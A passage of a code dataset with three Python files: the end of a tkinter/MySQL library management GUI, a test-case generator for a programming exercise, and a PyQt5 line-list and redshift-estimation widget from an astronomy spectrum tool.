uidLabel.place(x=10, y=10)\r\n uidEntry = Entry(updatedb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=uidvalue)\r\n uidEntry.place(x=230, y=10)\r\n\r\n ### Name DETAILS ###\r\n unamevalue = StringVar()\r\n unameLabel = Label(updatedb, text=\"Update Name:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='cyan', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n unameLabel.place(x=10, y=70)\r\n unameEntry = Entry(updatedb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=unamevalue)\r\n unameEntry.place(x=230, y=70)\r\n\r\n ### Book Name DETAILS ###\r\n ubnvalue = StringVar()\r\n ubnLabel = Label(updatedb, text=\"Update Book Name:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='cyan', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n ubnLabel.place(x=10, y=130)\r\n ubnEntry = Entry(updatedb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=ubnvalue)\r\n ubnEntry.place(x=230, y=130)\r\n\r\n ### Book ID DETAILS ###\r\n ubidvalue = StringVar()\r\n ubidLabel = Label(updatedb, text=\"Update Book ID:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='cyan', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n ubidLabel.place(x=10, y=190)\r\n ubidEntry = Entry(updatedb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=ubidvalue)\r\n ubidEntry.place(x=230, y=190)\r\n\r\n ### Author Name DETAILS ###\r\n uauthvalue = StringVar()\r\n uauthLabel = Label(updatedb, text=\"Update Author Name:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='cyan', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n uauthLabel.place(x=10, y=250)\r\n uauthEntry = Entry(updatedb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=uauthvalue)\r\n uauthEntry.place(x=230, y=250)\r\n\r\n ### Borrow Date DETAILS ###\r\n ubdvalue = StringVar()\r\n ubdLabel = Label(updatedb, text=\"Update Borrow Date:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='cyan', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n ubdLabel.place(x=10, y=310)\r\n ubdEntry = Entry(updatedb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=ubdvalue)\r\n ubdEntry.place(x=230, y=310)\r\n\r\n ### Return Date DETAILS ###\r\n urdvalue = StringVar()\r\n urdLabel = Label(updatedb, text=\"Update Return Date:\", font=(\r\n 'Helvetica', 15, 'italic bold'), bg='cyan', relief=GROOVE, width=17, borderwidth=4, anchor='n')\r\n urdLabel.place(x=10, y=370)\r\n urdEntry = Entry(updatedb, font=(\r\n 'Helvetica', 15, 'italic bold'), bd=5, textvariable=urdvalue)\r\n urdEntry.place(x=230, y=370)\r\n\r\n ### SUBMIT ###\r\n usubButton = Button(updatedb, text=\"Update\", font=('Helvetica', 15, 'italic bold'), bg='cyan',\r\n relief=RIDGE, width=8, borderwidth=5, bd=4, activebackground='red', activeforeground='white',command=update)\r\n usubButton.place(x=180, y=410)\r\n a = contenttable.focus()\r\n data = contenttable.item(a)\r\n b = data['values']\r\n if len(b) != 0:\r\n uidvalue.set(b[0])\r\n unamevalue.set(b[1])\r\n ubnvalue.set(b[2])\r\n ubidvalue.set(b[3])\r\n uauthvalue.set(b[4])\r\n ubdvalue.set(b[5])\r\n urdvalue.set(b[6])\r\n\r\n updatedb.mainloop()\r\n\r\n\r\n def deleteData():\r\n a = contenttable.focus()\r\n data = contenttable.item(a)\r\n b = data['values'][0]\r\n command = 'delete from library where student_id=%s'\r\n mycursor.execute(command,(b, ))\r\n con.commit()\r\n command = 'select * from library'\r\n mycursor.execute(command)\r\n contents = mycursor.fetchall()\r\n contenttable.delete(*contenttable.get_children())\r\n\r\n for i in contents:\r\n values = [i[0], i[1], i[2], i[3], i[4], i[5], i[6]]\r\n contenttable.insert('', END, values=values)\r\n\r\n messagebox.showinfo('Success!','Deleted Successfully!')\r\n\r\n def export():\r\n a = filedialog.asksaveasfilename()\r\n b = contenttable.get_children()\r\n id,name,bname,bid,authrname,bordat,retdat = [],[],[],[],[],[],[]\r\n for i in b:\r\n contents = contenttable.item(i)\r\n c = contents['values']\r\n # Treeview column order: Admn No, Name, Book Name, Book ID, Author, Borrow, Return\r\n id.append(c[0]),name.append(c[1]),bname.append(c[2]),bid.append(c[3]),authrname.append(c[4]),bordat.append(c[5]),retdat.append(c[6])\r\n cols = ['Admn No','Name','Book Name','Book ID','Author Name','Borrow Date','Return Date']\r\n fin = DataFrame(list(zip(id,name,bname,bid,authrname,bordat,retdat)),columns=cols)\r\n path = a+'.csv'\r\n fin.to_csv(path,index=False)\r\n messagebox.showinfo('Success!','Student Data Saved Successfully! 
{} '.format(path))\r\n \r\n \r\n\r\n\r\n root = Toplevel()\r\n root.title(\"LIBRARY MANAGEMENT SYSTEM\")\r\n root.geometry('1174x700+150+2')\r\n root.config(bg =\"#7395AE\")\r\n root.resizable(False,False)\r\n\r\n ### HEADING FRAME ###\r\n headingFrame = Frame(root, bg = \"Black\", relief = RIDGE,)\r\n headingFrame.place(x=0, y=0, width=1174, height=110)\r\n\r\n head = \"ZESCA\"\r\n headLabel = Label(headingFrame, text=head, fg=\"#FFFFFF\", font=(\r\n 'Elianto', 40),bg='Black')\r\n headLabel.place(x=26, y=20) \r\n\r\n dataEntryFrame = Frame(root , bg = 'Cyan' , relief = RIDGE, )\r\n dataEntryFrame.place(x=0,y=110,width=330,height=620)\r\n\r\n \r\n \r\n addDataButton = Button(dataEntryFrame, text=\"Add Book\", font=('Hero', 20), bg='white', relief=FLAT,\r\n width=13, command = addData)\r\n addDataButton.pack(side=TOP, expand=True)\r\n showallButton = Button(dataEntryFrame, text=\"Show All\", font=('Hero', 20), bg='white', relief=FLAT,\r\n width=13, command=showData)\r\n showallButton.pack(side=TOP, expand=True)\r\n searchDataButton = Button(dataEntryFrame, text=\"Search Book\", font=('Hero', 20), bg='white',\r\n relief=FLAT, width=13, command=searchData)\r\n searchDataButton.pack(side=TOP, expand=True)\r\n updateDataButton = Button(dataEntryFrame, text=\"Update Book\", font=('Hero', 20), bg='white',\r\n relief=FLAT, width=13, command=updateData)\r\n updateDataButton.pack(side=TOP, expand=True)\r\n deleteDataButton = Button(dataEntryFrame, text=\"Delete Book\", font=('Hero', 20), bg='white',\r\n relief=FLAT, width=13, command=deleteData)\r\n deleteDataButton.pack(side=TOP, expand=True)\r\n exportButton = Button(dataEntryFrame, text=\"Export\", font=('Hero', 20), bg='white', relief=FLAT,\r\n width=13, command=export)\r\n exportButton.pack(side=TOP, expand=True)\r\n\r\n\r\n ####SHOW CONTENT STUFF####\r\n showFrame = Frame(root, bg='black', relief=FLAT, borderwidth=3)\r\n showFrame.place(x=330, y=110, width=845, height=590)\r\n xScrollBar = Scrollbar(showFrame, orient=HORIZONTAL)\r\n yScrollBar = Scrollbar(showFrame, orient=VERTICAL)\r\n contenttable = Treeview(showFrame, columns=('Admn No', 'Name', 'Book Name', 'Book ID', 'Author Name',\r\n 'Borrow Date', 'Return Date'), yscrollcommand=yScrollBar.set, xscrollcommand=xScrollBar.set)\r\n\r\n ### STYLING STUFFS ###\r\n style = ttk.Style()\r\n style.configure('Treeview.Heading',font=('times',15,'bold'),foreground='black')\r\n style.configure('Treeview',font=('times',15,'bold'),background='black',foreground='cyan',rowheight=30)\r\n\r\n xScrollBar.pack(side=BOTTOM, fill=X)\r\n yScrollBar.pack(side=RIGHT, fill=Y)\r\n xScrollBar.config(command=contenttable.xview)\r\n yScrollBar.config(command=contenttable.yview)\r\n contenttable.heading('Admn No', text='Admn No')\r\n contenttable.heading('Name', text='Name')\r\n contenttable.heading('Book Name', text='Book Name')\r\n contenttable.heading('Book ID', text='Book ID')\r\n contenttable.heading('Author Name', text='Author Name')\r\n contenttable.heading('Borrow Date', text='Borrow Date')\r\n contenttable.heading('Return Date', text='Return Date')\r\n ### SIZE STUFFS ###\r\n contenttable.column('Admn No', width=150)\r\n contenttable.column('Name', width=250)\r\n contenttable.column('Book Name', width=200)\r\n contenttable.column('Book ID', width=150)\r\n contenttable.column('Author Name', width=170)\r\n contenttable.column('Borrow Date', width=250)\r\n contenttable.column('Return Date', width=250)\r\n\r\n contenttable['show'] = 'headings'\r\n contenttable.pack(fill=BOTH, expand=2)\r\n\r\n\r\n ####HEADING 
STUFFS####\r\n txt = \"WELCOME TO LIBRARY MANAGEMENT SYSTEM\"\r\n \r\n headLabel = Label(root, text=txt, font=('Elianto', 20, 'italic bold'),\r\n bg=\"Black\", relief=FLAT, width=45,foreground='black')\r\n headLabel.place(x=240, y=40)\r\n colors = [ 'snow', 'peach puff', 'yellow', 'ivory','black','green','pink','purple','blue','lime','orange']\r\n\r\n\r\n def headColor():\r\n fg = choice(colors)\r\n headLabel.config(fg=fg)\r\n headLabel.after(25, headColor)\r\n # headSlider()\r\n headColor()\r\n ####CONNECT BUTTON####\r\n connectButton = Button(root, text=\"Connect to DB\", font=('Hero', 15), bg='cyan', relief=FLAT,\r\n width=15 ,command=connectDB)\r\n connectButton.place(x=980, y=0)\r\n ####TEAM MEMBERS LIST####\r\n ## relief=RIDGE, width=15, borderwidth=5, bd=4, activebackground='red', activeforeground='white')\r\n #teamButton.place(x=0, y=0)\r\n root.mainloop()\r\n\r\n\r\n\r\n","repo_name":"OxOv3rH4uL/SCHOOL-MANAGEMENT-SYSTEM-GUI","sub_path":"library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":27972,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
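The GUI above only talks to MySQL after "Connect to DB" succeeds. A hedged, standalone way to sanity-check the same database outside tkinter; host, user and password are placeholders:

import mysql.connector as mysql

con = mysql.connect(host='localhost', user='root', passwd='secret')  # placeholder credentials
mycursor = con.cursor()
mycursor.execute('use librarymanagement')
mycursor.execute('select count(*) from library')
print('rows in library:', mycursor.fetchone()[0])
con.close()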
+{"seq_id":"72813916907","text":"import os\nimport sys\nimport importlib\nimport random\n\n# set fixed seed for generating test cases\nrandom.seed(123456789)\n\n# locate evaldir\nevaldir = os.path.join('..', 'evaluation')\nif not os.path.exists(evaldir):\n os.makedirs(evaldir)\n\n# locate solutiondir\nsolutiondir = os.path.join('..', 'solution')\nif not os.path.exists(solutiondir):\n os.makedirs(solutiondir)\n\n# load functionality defined in sample solution\nmodule_name = 'solution'\nfile_path = os.path.join(solutiondir, 'solution.en.py')\nspec = importlib.util.spec_from_file_location(module_name, file_path)\nmodule = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(module)\n\nfor name in dir(module):\n if not (name.startswith('__') and name.endswith('__')):\n globals()[name] = eval(f'module.{name}')\n\n# generate test data for function multiplication table\ncases = {\n 'en': [\n ('bee', 'tween'),\n ],\n 'nl': [\n ('een', 'twee'),\n ]\n}\nlanguages = list(cases)\n\n# generate unit tests for function common_characters\nsys.stdout = open(os.path.join('..', 'evaluation', '0.in'), 'w', encoding='utf-8')\nfor language in languages:\n for index, (word1, word2) in enumerate(cases[language]):\n\n # generate test expression\n print(f'>>> common_characters({word1!r}, {word2!r})')\n if not index:\n print(f'')\n\n # generate return value\n try:\n print(f'{common_characters(word1, word2)!r}')\n except Exception as e:\n print('Traceback (most recent call last):\\n{}: {}'.format(e.__class__.__name__, e))\n\n print()\n","repo_name":"dodona-edu/programmeursleerling","sub_path":"chapters/08 functions/08 exercises/02 common characters/preparation/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"41446735335","text":"import sys\nimport os\nimport pandas as pd\nfrom numpy import floor, log10, isnan, nan, isinf\n\nfrom PyQt5.QtWidgets import QWidget, QVBoxLayout, QHBoxLayout, QGridLayout, QLabel, QComboBox, QLineEdit, QPushButton, QCheckBox\nfrom PyQt5.QtCore import pyqtSignal\n\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtGui\nfrom PyQt5.QtGui import QDoubleValidator\n\nfrom IGM.rb_setline import read_line_list\n\nLINELIST_DIR = os.path.dirname(os.path.abspath(__file__))\n\n# This widget includes the primary linelist, redshift estimation\n# and secondary linelists.\n# Since this class has complicated structure in terms of widget composition,\n# only import useful modules/functions to avoid slow-down running time\nclass LineListWidget(QWidget):\n\t# Linelist constant\n\t# only need to update this one\n\tLINELISTS = ['NONE']\n\twith open(LINELIST_DIR+'/gui_linelists.ascii') as f:\n\t\tnext(f)\n\t\tfor line in f:\n\t\t\tLINELISTS.append(line.strip())\n\n\t# check function _get_linelist_df if any error showed up\n\n\t# Exporting signals\n\tsend_lineindex = pyqtSignal(int)\n\tsend_linelist = pyqtSignal(object)\n\tsend_more_linelist = pyqtSignal(object)\n\tsend_more_linelist_z = pyqtSignal(object)\n\tsend_data = pyqtSignal(object)\n\tsend_gauss_num = pyqtSignal(int)\n\tsend_message = pyqtSignal(str)\n\tsend_z_returnPressed = pyqtSignal(float)\n\tsend_linelists2multiG = pyqtSignal(list)\n\n\t# initialization - widget layout\n\tdef __init__(self):\n\t\tsuper().__init__()\n\n\t\t#internal values\n\t\tself.linelist = []\n\t\tself.filename = ''\n\t\tself.filenames = []\n\t\tself.newz = []\n\n\t\t# Main(Grand) widget layout\n\t\tglayout = QVBoxLayout()\n\n\t\t# Widget column names\n\t\tlayout = QGridLayout()\n\t\tlayout.addWidget(QLabel('LineList Name'), 0, 0)\n\t\tlayout.addWidget(QLabel('Ion Name'), 0, 1)\n\t\tlayout.addWidget(QLabel('#Gauss'), 0, 2)\n\t\tlayout.addWidget(QLabel('Estimated z'), 0, 3)\n\t\tlayout.addWidget(QLabel('z error'), 0, 4)\n\t\tlayout.addWidget(QLabel('Confidence'), 0, 5)\n\t\tlayout.addWidget(QLabel('Flag'), 0, 6)\n\n\t\t# linelist combobox\n\t\tself.l_lln = QComboBox()\n\t\tself.l_lln.setFixedWidth(120)\n\t\tself.l_lln.addItems(self.LINELISTS)\n\t\tlayout.addWidget(self.l_lln, 1, 0)\n\t\t# selecting a linelist in linelists box triggers another action\n\t\tself.l_lln.currentTextChanged.connect(self._linelist_changed)\n\n\t\t# Ion Names in this selected line-list\n\t\t# Note: 'ALL' is in index 0\n\t\tself.l_combobox = QComboBox()\n\t\tself.l_combobox.setFixedWidth(150)\n\t\tlayout.addWidget(self.l_combobox, 1, 1)\n\t\tself.l_combobox.addItem('NONE')\n\t\tself.l_combobox.setCurrentIndex(0)\n\t\t# selecting an ion in a linelist triggers another action\n\t\tself.l_combobox.currentIndexChanged.connect(self._index_changed)\n\t\t#self.l_combobox.currentTextChanged.connect(self._text_changed)\n\n\t\t# Number of Gaussian specified\n\t\tself.gauss_num = QComboBox()\n\t\tself.gauss_num.setFixedWidth(50)\n\t\tself.gauss_num.addItems(['0', '1', '2', '3'])\n\t\tself.gauss_num.setCurrentIndex(1)\n\t\t# selecting a number of the box triggers another action\n\t\tself.gauss_num.activated.connect(self._on_gauss_num_activated)\n\t\tlayout.addWidget(self.gauss_num, 1,2)\n\n\t\t# User-input textboxes\n\t\t# this validator only allows user to type numbers\n\t\tself.onlyFloat = QDoubleValidator()\n\t\t# Estimated redshift\n\t\tself.estZ = QLineEdit()\n\t\tself.estZ.setPlaceholderText('Guess 
redshift')\n\t\tself.estZ.setMaximumWidth(100)\n\t\tself.estZ.setValidator(self.onlyFloat)\n\t\t# pressing return button triggers another action\n\t\tself.estZ.returnPressed.connect(self._on_z_return_pressed)\n\t\t# Errors in estimated redshift\n\t\tself.estZstd = QLineEdit()\n\t\tself.estZstd.setPlaceholderText('z Error')\n\t\tself.estZstd.setMaximumWidth(100)\n\t\tself.estZstd.setValidator(self.onlyFloat)\n\t\tself.estZstd.setReadOnly(True)\n\t\t# Confidence level\n\t\tself.conf = QLineEdit()\n\t\tself.conf.setPlaceholderText('[0, 1.]')\n\t\tself.conf.setMaximumWidth(150)\n\t\tself.conf_onlyFloat = QDoubleValidator(bottom=0., \n\t\t\t\t\t\t\t\t\t\t\t\ttop=1., \n\t\t\t\t\t\t\t\t\t\t\t\tdecimals=3,\n\t\t\t\t\t\t\t\t\t\t\t\tnotation=QDoubleValidator.StandardNotation)\n\t\tself.conf.setValidator(self.conf_onlyFloat)\n\t\t# Flags/Comments on this\n\t\tself.flag = QLineEdit()\n\t\tself.flag.setPlaceholderText('Additional Info?')\n\n\t\t# Button to save current estimation to table/database\n\t\tbutton = QPushButton('Add to Table below')\n\t\t# clicking button triggers another action\n\t\tbutton.clicked.connect(self._on_button_clicked)\n\n\n\t\tlayout.addWidget(self.estZ, 1,3)\n\t\tlayout.addWidget(self.estZstd, 1, 4)\n\t\tlayout.addWidget(self.conf, 1,5)\n\t\tlayout.addWidget(self.flag, 1,6)\n\t\tlayout.addWidget(button, 1,7)\n\n\t\t# Secondary linelists\n\t\tl_checkbox = QCheckBox('Add More Linelists to Examine..')\n\t\t# only triggers to set up more secondary linelist when checked\n\t\tl_checkbox.stateChanged.connect(self._intialize_more_linelist)\n\t\tl_hlayout = QHBoxLayout()\n\n\t\t# Number of secondary linelists needed\n\t\tnum_llists = 6\n\t\tself.llists_2 = []\n\t\tfor i in range(num_llists):\n\t\t\tself.llists_2.append(self.add_linelists())\n\t\t\t#indices for llists_2:\n\t\t\t# 0-layout, 1-linelist combobox, 2-z lineedit\n\t\t\tl_hlayout.addLayout(self.llists_2[i][0])\n\n\n\t\tglayout.addLayout(layout)\n\t\tglayout.addWidget(l_checkbox)\n\t\tglayout.addLayout(l_hlayout)\n\t\t\n\t\tglayout.setAlignment(QtCore.Qt.AlignTop | QtCore.Qt.AlignLeft)\n\t\tself.setLayout(glayout)\n\t\tself.setFixedHeight(150)\n\n\t# utility function to set up secondary linelist\n\tdef add_linelists(self):\n\t\tll_layout = QGridLayout()\n\t\tl_combox = QComboBox()\n\n\t\tl_combox.setFixedWidth(80)\n\t\tz_edit = QLineEdit()\n\t\tz_edit.setPlaceholderText('Guess z')\n\t\tz_edit.setReadOnly(True)\n\t\tz_edit.setMaximumWidth(60)\n\t\t#ll_layout.addWidget(QLabel('Linelist'), 0,0)\n\t\t#ll_layout.addWidget(QLabel('Guess z'), 0,1)\n\t\tll_layout.addWidget(l_combox, 0,0)\n\t\tll_layout.addWidget(z_edit, 0,1)\n\t\tll_layout.setAlignment(QtCore.Qt.AlignLeft)\n\n\t\treturn ll_layout, l_combox, z_edit\n\n\t# intialize secondary linelist sytles\n\tdef _intialize_more_linelist(self, s):\n\t\t# if the checkbox is checked, initialize secondary linelists\n\t\tif s == QtCore.Qt.Checked:\n\t\t\t# initialize more linelists for plotting\n\t\t\tcolors = ['#A52A2A', '#FF7F50', '#40E0D0', '#DAA520', '#008000', '#4B0082']\n\t\t\tfor i in range(len(self.llists_2)):\n\t\t\t\tself.llists_2[i][1].addItems(self.LINELISTS)\n\t\t\t\tt_color = 'QComboBox {color:' + colors[i] + '}'\n\t\t\t\tself.llists_2[i][1].setStyleSheet(t_color)\n\t\t\t\t# 2 parameters need to be passed: 1.selected linelist and 2.index of linelist widget changed\n\t\t\t\tself.llists_2[i][1].currentTextChanged.connect(lambda s, idx=i: self._addtional_linelist(idx, s))\n\t\t\t\t\n\t\t\t\tself.llists_2[i][2].setReadOnly(False)\n\t\t\t\t# only the index of linelist widget 
passed\n\t\t\t\tself.llists_2[i][2].returnPressed.connect(lambda idx=i: self._guess_z_return_pressed(idx))\n\t\telse:\n\t\t\t# if checkbox is unchecked, grey out all things\n\t\t\tfor i in range(len(self.llists_2)):\n\t\t\t\tself.llists_2[i][1].clear()\n\t\t\t\tself.llists_2[i][2].clear()\n\t\t\t\tself.llists_2[i][2].setReadOnly(True)\n\t\t\t\n\t# action to press return button on estZ LineEdit\n\tdef _on_z_return_pressed(self):\n\t\tself.send_z_returnPressed.emit(float(self.estZ.text()))\n\t\tif self.gauss_num.currentIndex() < 1:\n\t\t\tself.estZstd.setText('nan')\n\t\t\t# this will not changed the default self.newz values\n\n\t# importing signal(linelist name) to slot\n\tdef on_linelist_name_slot(self, sent_linelist_name):\n\t\tself.l_lln.setText(sent_linelist_name)\n\tdef on_linelist_slot(self, sent_linelist):\n\t\tself.linelist = sent_linelist\n\t\t#self.l_combobox.addItems(['NONE', 'ALL'] + self.linelist['name'].tolist())\n\t\t#print(self.linelist)\n\n\t# ion line combobox events\n\tdef _index_changed(self, i): # i is an int\n\t\tself.send_lineindex.emit(i)\n\n\tdef _text_changed(self, s): # s is a str\n\t\ttmp_df = self.linelist.set_index('name')\n\n\t# Display all available ions in a selected linelist\n\tdef _linelist_changed(self, s):\n\t\tif s in 'NONE':\n\t\t\tself.send_linelist.emit(s)\n\t\t\tself.l_combobox.clear()\n\t\t\tself.l_combobox.addItem('NONE')\n\t\t\tself.l_combobox.setCurrentIndex(0)\n\t\telse:\n\t\t\tllist = self._get_linelist_df(s)\n\t\t\tself.linelist = llist\n\n\t\t\tself.l_combobox.addItems(['ALL'] + self.linelist['name'].tolist())\n\t\t\tself.send_linelist.emit(self.linelist)\n\t\t\tself.l_combobox.setCurrentIndex(1)\n\n\t# display estimated redshifts and error\n\t# with specified significant figures\n\tdef _on_estZ_changed(self, newz):\n\t\tshow_sigfig = 5\n\t\tself.newz = newz\n\t\tif not isnan(float(self.newz[0])):\n\t\t\tself.estZ.setText(str(self.round_to_sigfig(newz[0], show_sigfig)))\n\t\t\tif self.gauss_num.currentIndex() > 0:\n\t\t\t\t# Except for manually guessing z (i.e., gauss_num=0),\n\t\t\t\t# sending out estZ to plot automatically without return pressed\n\t\t\t\tself.send_z_returnPressed.emit(self.newz[0])\n\t\telse:\n\t\t\tself.estZ.setText('nan')\n\t\tif not isnan(float(self.newz[1])):\n\t\t\tself.estZstd.setText(str(self.round_to_sigfig(newz[1], show_sigfig)))\n\t\telse:\n\t\t\tself.estZstd.setText('nan')\n\n\t# importing signal(filename) to slot\n\tdef _on_sent_filename(self, sent_filename):\n\t\tself.filename = sent_filename\n\n\t# importing signal(filenames) to slot\n\tdef _on_sent_filenames(self, sent_filenames):\n\t\tself.filenames = sent_filenames\n\n\t# importing signal(FitsObj) to slot\n\tdef _on_sent_fitsobj(self, sent_fitsobj):\n\t\tself.fitsobj = sent_fitsobj\n\t\t'''\n\t\tif self.fitsobj.z_est is not None:\n\t\t\t# change estZ from z_guess to z_est\n\t\t\tprint('found nonzero z_est')\n\t\t\tself.estZ.setText(str(self.round_to_sigfig(self.fitsobj.z_est, 3)))\n\t\t\tself.send_message.emit('Esimated redshift is found in the database!')\n\t\telif self.fitsobj.z_guess is not None:\n\t\t\t# replace estZ if z_guess is available\n\t\t\tself.estZ.setText(str(self.round_to_sigfig(self.fitsobj.z_guess, 3)))\n\t\t\tself.send_message.emit('Redshift posterior is found in the FITS file!')\n\t\t'''\n\n\t# action to \"Add to Table below\"\n\t# log available values to DataFrame\n\tdef _on_button_clicked(self, sfilename):\n\t\tif len(self.estZ.text().strip()) < 1:\n\t\t\tself.estZ.setText('nan')\n\t\tif len(self.estZstd.text().strip()) < 
1:\n\t\t\tself.estZstd.setText('nan')\n\t\tif len(self.conf.text().strip()) < 1:\n\t\t\tself.conf.setText('0')\n\t\tif len(self.flag.text().strip()) < 1:\n\t\t\tself.flag.setText('No comments')\n\n\t\t# prepare exporting data\n\t\tdata = {'Name': self.filename,\n\t\t\t\t'z': self.newz[0], #float(self.estZ.text()),\n\t\t\t\t'z_err': self.newz[1], #float(self.estZstd.text()),\n\t\t\t\t'Confidence': float(self.conf.text()),\n\t\t\t\t'Linelist': self.l_lln.currentText(),\n\t\t\t\t'Flag': self.flag.text()}\n\t\t# add coordiantes if they are available\n\t\tif self.fitsobj.ra is not None:\n\t\t\tdata.update({'RA': self.fitsobj.ra,\n\t\t\t\t\t\t\t'DEC': self.fitsobj.dec})\n\t\t# add z_guess if it is available\n\t\tif self.fitsobj.z_guess is not None:\n\t\t\tdata.update({'z_guess': self.fitsobj.z_guess})\n\n\t\t# export data to DataFrame table\n\t\tself.send_data.emit(data)\n\n\t# importing data from table to slot\n\tdef _on_sent_dictdata(self, sent_dict):\n\t\t#print(self.filename)\n\t\t#print(sent_dict)\n\n\t\t# if received data is non-empty\n\t\t# add data back to corresponding LineEdit widgets\n\t\tif len(sent_dict) > 0:\n\t\t\t#print(sent_dict['z'])\n\t\t\tif not isnan(float(sent_dict['z'])):\n\t\t\t\t# extract z_estimated from z column\n\t\t\t\tif len(self.newz) < 2:\n\t\t\t\t\tself.newz.append(float(sent_dict['z']))\n\t\t\t\t\tself.newz.append(float(sent_dict['z_err']))\n\t\t\t\telse:\n\t\t\t\t\tself.newz[0] = float(sent_dict['z'])\n\t\t\t\t\tself.newz[1] = float(sent_dict['z_err'])\n\n\t\t\t\tshow_sigfig = 5\n\t\t\t\tprint(self.newz)\n\t\t\t\tself.estZ.setText(str(self.round_to_sigfig(self.newz[0], show_sigfig)))\n\t\t\t\tif not isnan(float(self.newz[1])):\n\t\t\t\t\tself.estZstd.setText(str(self.round_to_sigfig(self.newz[1], show_sigfig)))\n\t\t\t\telse:\n\t\t\t\t\tself.estZstd.setText('nan')\n\t\t\t\tself.send_message.emit('Found estimated z in table!')\n\n\t\t\telif not isnan(float(sent_dict['z_guess'])):\n\t\t\t\t# extract z_estimated from z_guess column\n\t\t\t\tif len(self.newz) < 2:\n\t\t\t\t\tself.newz.append(float(sent_dict['z_guess']))\n\t\t\t\t\tself.newz.append(0.)\n\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tself.newz[0] = float(sent_dict['z_guess'])\n\t\t\t\t\tself.newz[1] = nan\t\t\t\t\n\t\t\t\tself.estZ.setText(str(self.newz[0]))\n\t\t\t\tself.estZstd.setText(str(self.newz[1]))\n\t\t\t\n\t\t\tself.conf.setText(str(sent_dict['Confidence']))\n\t\t\tself.flag.setText(str(sent_dict['Flag']))\n\t\t\tself.l_lln.setCurrentText(str(sent_dict['Linelist']))\n\t\t\tself.send_message.emit(\"Can't find z in table! 
Use z_guess now..\")\n\t\telse:\n\t\t\t# sent_dict data is empy, reset everythin\n\t\t\tself.estZ.clear()\n\t\t\tself.estZstd.clear()\n\t\t\tself.newz = [nan, nan] # reset est_z and est_z_std back to nans\n\n\t\t\tself.conf.clear()\n\t\t\tself.flag.clear()\n\t\t\tself.l_lln.setCurrentIndex(0)\n\n\t# action to number of Gaussians selected\n\tdef _on_gauss_num_activated(self):\n\t\t# exporting signals\n\t\tself.send_gauss_num.emit(int(self.gauss_num.currentText()))\n\t\tself.send_linelists2multiG.emit(self.LINELISTS)\n\n\t# utility function to round values to desired significant figures\n\tdef round_to_sigfig(self, num=0., sigfig=1):\n\t\tif num is not None:\n\t\t\ttmp = log10(abs(num))\n\t\t\tif isinf(tmp):\n\t\t\t\treturn 0\n\t\t\telse:\n\t\t\t\treturn round(num, sigfig - int(floor(tmp)) - 1)\n\t\telse:\n\t\t\treturn None\n\n\t# load full content in all secondary linelist\n\tdef _addtional_linelist(self, i, s):\n\t\t# i = index of the widget passing linelist\n\t\t# s = name of the linelist\n\t\tllist = pd.DataFrame(columns=['wave', 'name'])\n\t\tif s in 'NONE':\n\t\t\tself.send_more_linelist.emit({i:s})\n\t\telse:\n\t\t\tllist = self._get_linelist_df(s)\n\n\t\t\tself.send_more_linelist.emit({i:llist})\n\n\t# action to press return on secondary z_guess LineEdit widgets\n\tdef _guess_z_return_pressed(self, i):\t\t\n\t\tllist = self._get_linelist_df(self.llists_2[i][1].currentText())\n\t\tif (len(self.llists_2[i][2].text()) < 1) | (self.llists_2[i][2].text().isalpha()):\n\t\t\tz_guess = 0\n\t\t\tself.llists_2[i][2].setText('0')\n\t\telse:\n\t\t\tz_guess = float(self.llists_2[i][2].text())\n\n\t\tif (self.llists_2[i][1].currentText() == 'NONE' ) & (z_guess == 0):\n\t\t\tpass\n\t\telse:\n\t\t\tself.send_more_linelist_z.emit([{i:llist}, z_guess])\n\n\t# action to read linelist as dataframe\n\tdef _get_linelist_df(self, linelist_name):\n\t\tllist = pd.DataFrame(columns=['wave', 'name'])\n\t\ttmp = read_line_list(linelist_name)\n\n\t\t#need a line to append wrest to name if it doesn't have one\n\t\tif any(map(str.isdigit, tmp[1]['ion'])):\n\t\t\t# if name column has wrest\n\t\t\tfor li in tmp:\n\t\t\t\tnewrow = {'wave': li['wrest'], 'name': li['ion']}\n\t\t\t\tllist = llist.append(newrow, ignore_index=True)\n\t\telse:\n\t\t\t# if name column doesn't have wrest, need to append\n\t\t\tfor li in tmp:\n\t\t\t\tnewrow = {'wave': li['wrest'], 'name': li['ion']+' '+str(round(li['wrest']))}\n\t\t\t\tllist = llist.append(newrow, ignore_index=True)\n\n\t\treturn llist","repo_name":"rongmon/rbcodes","sub_path":"GUIs/zgui/linelist_selection.py","file_name":"linelist_selection.py","file_ext":"py","file_size_in_byte":14272,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"}
